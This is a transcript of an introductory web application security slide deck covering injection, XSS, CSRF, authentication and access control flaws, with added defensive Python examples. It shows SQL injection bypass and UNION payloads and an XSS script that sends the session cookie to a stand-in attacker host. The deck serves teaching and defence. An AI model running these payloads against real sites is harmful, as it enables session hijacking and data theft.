Web Application Security in a Nutshell

An ultra-compact intro (or refresher) to web application security. Created by Björn Kimminich (@bkimminich). 38 slides.

Uploaded by bjoern-kimminich, posted on 30-Jun-2015


DESCRIPTION

View this presentation online at http://webappsec-nutshell.kimminich.de/

TRANSCRIPT

Page 1

WEB APPLICATION SECURITY IN A NUTSHELL
AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY

Created by Björn Kimminich (@bkimminich)

Page 2

BJÖRN KIMMINICH

- Application Security Officer at Kuehne + Nagel (AG & Co.) KG
- Author of the open-source pentest training webapp juice-shop
- OWASP member and OWASP Zed Attack Proxy contributor

Page 3

FAMOUS LAST WORDS...

- “Nobody would bother to hack us.”
- “Our Firewall, IDS and IPS will keep us safe.”
- “We will add security to the system later.”
- “What's the worst that could actually happen?”

Page 4

INJECTION

Page 5

INJECTION MEANS...

...tricking an application into including unintended commands in the data sent to an interpreter.

Page 6

INTERPRETER MEANS...

...a program that takes a String and interprets it as a command.

Page 7

INTERPRETERS ARE USED FOR...

- SQL
- HQL
- OS Shell
- LDAP
- XPath
- ...

Page 8

BYPASSING AUTHENTICATION WITH SQL INJECTION

```java
String query = "SELECT id FROM users " +
               "WHERE name = '" + req.getParameter("username") + "' " +
               "AND password = '" + req.getParameter("password") + "'";
```

The intended use case results in a query like this:

```sql
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
```

Page 9

ATTACK EXAMPLES ON AUTHENTICATION QUERIES

Disabling password check for a known username:

```sql
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
```

Logging in without even knowing a username:

```sql
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
```

Page 10

SPYING OUT DATA WITH SQL INJECTION

```java
String query = "SELECT id,author,title,price FROM books " +
               "WHERE title LIKE '%" + req.getParameter("query") + "%'";
```

The intended use case results in a query like this:

```sql
SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
```

Page 11

ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES

Probing for the right number of result set columns:

```sql
SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
```

Using known column names to extract data:

```sql
SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
```

Page 12

PREVENTING INJECTION

- Avoid Interpreters
- Bind Variables
- Prepared Statements
- Least Privileges for app DB user
- White List Input Validation
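The deck's query-building code is Java; as an added example (not from the slides), the same login lookup in Python against a constructed in-memory SQLite table puts the concatenated query from slide 8 beside its bind-variable fix and a white-list username check, so the effect of the slide 9 inputs on each can be compared directly. The function names, the sample rows and the username policy are assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the slides' "users" table. Passwords are kept
# in plaintext only to keep this demo short; a real table holds salted hashes (slide 27).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    con.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                    [("admin", "admin-pw"), ("bjoern", "secret")])
    return con

def login_concat(con, username, password):
    """Vulnerable: the slide's string-concatenated query. Input becomes SQL syntax,
    so a quote plus '--' comments out the password check."""
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    return sorted(row[0] for row in con.execute(query))

def login_prepared(con, username, password):
    """Fixed: bind variables. SQL text and data travel separately, so a quote or
    comment marker in the input is only ever compared as a string value."""
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in con.execute(query, (username, password)))

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")  # assumption: the app's username policy

def is_valid_username(username):
    """White-list input validation: defence in depth, not a substitute for binding."""
    return USERNAME_RE.fullmatch(username) is not None

if __name__ == "__main__":
    con = make_db()
    for user, pw in [("bjoern", "secret"), ("bjoern'--", "x"), ("' or 1=1--", "x")]:
        print(repr(user), "concat:", login_concat(con, user, pw),
              "prepared:", login_prepared(con, user, pw),
              "valid username:", is_valid_username(user))
```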

Page 13

CROSS SITE SCRIPTING (XSS)

Page 14

MALICIOUS CODE IS SENT...

...to an innocent user's browser through

- a form field or URL (Reflected XSS)
- a previously stored DB record (Persistent XSS)
- a DOM element of a rich JS client (Local XSS)

Page 15

POSSIBLE DAMAGE FROM XSS

- stolen user session
- stolen sensitive data
- rewriting web page
- redirecting to malicious site

Page 16

XSS VULNERABILITY EXAMPLE

http://bookwo.rm/titles/search?keywords=raspberry%20pi

The intended use case is to display the keywords above the results:

```jsp
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.count()%> results for your search by <em><%=keywords%></em>
<table>
    <% for (Book book : results) { %>
      <%-- render result as table rows --%>
    <% } %>
</table>
```

Page 17

XSS ATTACK EXAMPLES

Probing for XSS Vulnerability:

```html
<script>alert(1)</script>
```

Stealing User Session:

```html
<script>
    new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
</script>
```

Site Defacement:

```html
<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
```

Page 18

PREVENTING XSS

- Do not unnecessarily include user supplied input into output
- Output encode all user supplied input
- Sanitize HTML where user supplied HTML is unavoidable
- White List Input Validation
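Added example (not from the slides) of the two defences that matter for slide 16: output-encoding the `keywords` parameter before it lands in the `<em>` element, and an allow-list sanitizer for the case where users are permitted to submit a little HTML. Written in Python with only the standard library; the allowed tag set and function names are assumptions.

```python
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}  # assumption: what the app needs

def render_search_header(keywords, count):
    """Output encoding for the slide 16 template: the untrusted value is encoded for
    the HTML text context it is inserted into. html.escape is right for text and
    quoted attribute values only; a JavaScript string or URL needs its own encoder."""
    safe = html.escape(keywords, quote=True)
    return f"There are {count} results for your search by <em>{safe}</em>"

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch: allow-listed tags are re-emitted without
    any attributes (so no event handlers survive), everything else is dropped, and
    all text is re-encoded."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

def sanitize_html(fragment):
    """Use only where user supplied HTML is unavoidable; otherwise encode instead."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```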

Page 19

CROSS SITE REQUEST FORGERY (CSRF)

Page 20

A VICTIM'S BROWSER...

...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request:

- Session Cookie
- Basic Authentication
- Authorization HTTP Header
- ...

Page 21

CSRF ATTACK EXAMPLES

Page 22

PREVENTING CSRF

- Add a secret token to all sensitive requests
- This token must not be automatically submitted
- Require secondary authentication for sensitive functions
- Beware exposing the token in a Referer HTTP header

Make sure your application has no XSS holes that could be exploited to attack others!
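The synchronizer-token pattern the slide describes, as an added Python example that is not part of the deck: a per-session secret is issued server-side, carried in a hidden form field (which the browser does not send on its own, unlike the session cookie), and checked in constant time before any state change. `session` is assumed to be a server-side store and `form` the parsed POST body; the `handle_transfer` endpoint is a constructed stand-in for any sensitive function.

```python
import hmac
import secrets

def issue_csrf_token(session):
    """One unguessable secret per session, stored server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def hidden_field(token):
    """The token travels in the POST body. Unlike a cookie it is never attached
    automatically, and unlike a URL parameter it cannot leak via the Referer header."""
    return f'<input type="hidden" name="csrf_token" value="{token}">'

def is_valid_csrf(session, form):
    """Constant-time comparison of the submitted token against the session's copy."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())

def handle_transfer(session, form):
    """State-changing endpoint: refuses any request whose token does not round-trip.
    A forged cross-site POST carries the victim's cookie but not this token."""
    if not is_valid_csrf(session, form):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"
```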

Page 23

BROKEN AUTHENTICATION

Page 24

TYPICAL AUTHENTICATION FLAWS

- Allowing weak passwords
- Storing SSL certificate insecurely
- Credentials passed via insecure http connection
- Exposing session IDs in URLs, via unencrypted network, logs, ...

Page 25

SIDE CHANNEL ATTACK VECTORS

- Change Password
- “Remember me”
- Forgot Password
- Secret Questions

Make sure your application does not store credentials in its database unencrypted!

Page 26

CLASSICAL BROKEN AUTHENTICATION...
...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE

http://sick-cure-ba.nk/login.do

```http
POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

username=bjoern&password=secret
```

Page 27

WEAK HASHES PUT PASSWORDS AT RISK...
...AS DO UNSALTED STRONG HASH ALGORITHMS

| id | username   | password                                                                                                                         |
|----|------------|----------------------------------------------------------------------------------------------------------------------------------|
| 1  | admin      | d033e22ae348aeb5660fc2140aec35850c4da997                                                                                         |
| 2  | bjoern     | 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b                                                                 |
| 3  | localhorst | 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006 |

Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512 bit length. You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
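Added Python example (not from the slides) contrasting the unsalted storage the table shows with salted, iterated hashing: the digest stored for bjoern on this slide is exactly the plain SHA-256 of the password `secret` used on slide 8, which is why a single precomputed table cracks it, whereas a random per-user salt makes every stored value unique and forces an attacker to work on one account at a time. The storage format string, the function names and the iteration count are assumptions.

```python
import base64
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumption: tune to your hardware; slows crackers equally

# Value taken from row 2 of the slide's table.
SLIDE_HASH_BJOERN = "2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b"

def unsalted_sha256(password):
    """What the slide warns against: identical passwords give identical digests,
    so one precomputed (rainbow) table cracks every user who chose that password."""
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated PBKDF2-HMAC-SHA256. Constructed storage format:
    algorithm$iterations$base64(salt)$base64(digest), so parameters can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode())

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    return hmac.compare_digest(actual, expected)
```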

Page 28

BROKEN ACCESS CONTROL

Page 29

COMMON AUTHORIZATION MISTAKES

- Hiding object references instead of restricting access
- Displaying only authorized links and menu choices
- Trusting client-side access control mechanisms
- Lack of server-side verification of user privileges

Page 30

REQUEST TAMPERING FOR PRIVILEGE ESCALATION...
...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES

http://logistics-worldwi.de/showShipment?id=40643108

http://my-universi.ty/api/students/6503/exams/view

http://document-warehou.se/landingpage?content=index.html

Page 31

SECURING AUTHORIZATION

- Never rely on “Security by obscurity”
- Replace direct object references with temporary mappings
- Restrict data and functionality access to authorized users
- Enforce user or role based permissions
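Added Python example (not from the slides) for the `showShipment?id=...` case on slide 30: every lookup is authorized on the server against owner and role, and the client is handed random per-session handles instead of database ids, so a tampered id is neither honoured nor informative. The shipment and role data are constructed, and the function names are assumptions.

```python
import secrets

# Constructed sample data standing in for the records behind
# http://logistics-worldwi.de/showShipment?id=...
SHIPMENTS = {
    40643108: {"owner": "bjoern", "destination": "Hamburg"},
    40643109: {"owner": "alice", "destination": "Oslo"},
}
ROLES = {"bjoern": "customer", "alice": "customer", "ops": "admin"}  # constructed

def is_authorized(user, shipment):
    """Server-side rule: the owner or an admin role. Hidden links and client-side
    checks play no part in this decision."""
    return shipment["owner"] == user or ROLES.get(user) == "admin"

def show_shipment_direct(user, shipment_id):
    """Direct object reference, made safe by verifying every access on the server.
    Unknown and unauthorized ids get the same answer, so ids cannot be enumerated."""
    shipment = SHIPMENTS.get(shipment_id)
    if shipment is None or not is_authorized(user, shipment):
        raise PermissionError("not authorized for this shipment")
    return shipment

def list_shipments(session, user):
    """Indirect references: the client sees random per-session handles; the mapping
    back to real ids lives only in the server-side session."""
    session["refs"] = {}
    for shipment_id, shipment in SHIPMENTS.items():
        if is_authorized(user, shipment):
            session["refs"][secrets.token_urlsafe(8)] = shipment_id
    return list(session["refs"])

def show_shipment_indirect(session, user, ref):
    """A guessed or foreign handle resolves to nothing; a valid one is still
    re-checked against the permission rule (mapping is not authorization)."""
    shipment_id = session.get("refs", {}).get(ref)
    if shipment_id is None:
        raise PermissionError("unknown reference")
    return show_shipment_direct(user, shipment_id)
```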

Page 32

BROKEN ENVIRONMENT

Page 33

POSSIBLE ENVIRONMENTAL VULNERABILITIES

- Software Libraries
- Application Server
- Web Server
- Operating System
- ...

Page 34

KNOWN VULNERABILITY EXAMPLES

| Component | Vulnerability | Affected |
|-----------|---------------|----------|
| OpenSSL   | Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) | 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1 |
| Unix Bash | Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock) | CGI, OpenSSH, DHCP, QMail, ... |
| Struts    | Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method | before 2.3.16.1 |
| Struts    | Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation | before 2.3.16.2 |

Page 35

PROTECTION FROM ENVIRONMENTAL VULNERABILITIES

- Monitor security of used components
- Keep up with patches for used components
- Remove unnecessary stuff on all levels
- Restrict use of unapproved components

Java and .NET project dependencies can be monitored by OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.

Page 36

Q&A

Page 37

CREDITS

Presentation created with reveal.js, The HTML Presentation Framework.

Based on free material provided by OWASP, The Open Web Application Security Project.

Background image based on Digital Shodan by sephiroth-kmfdm.

Page 38

THE END

BY BJÖRN KIMMINICH / KIMMINICH.DE

These slides are publicly available on GitHub and Slideshare.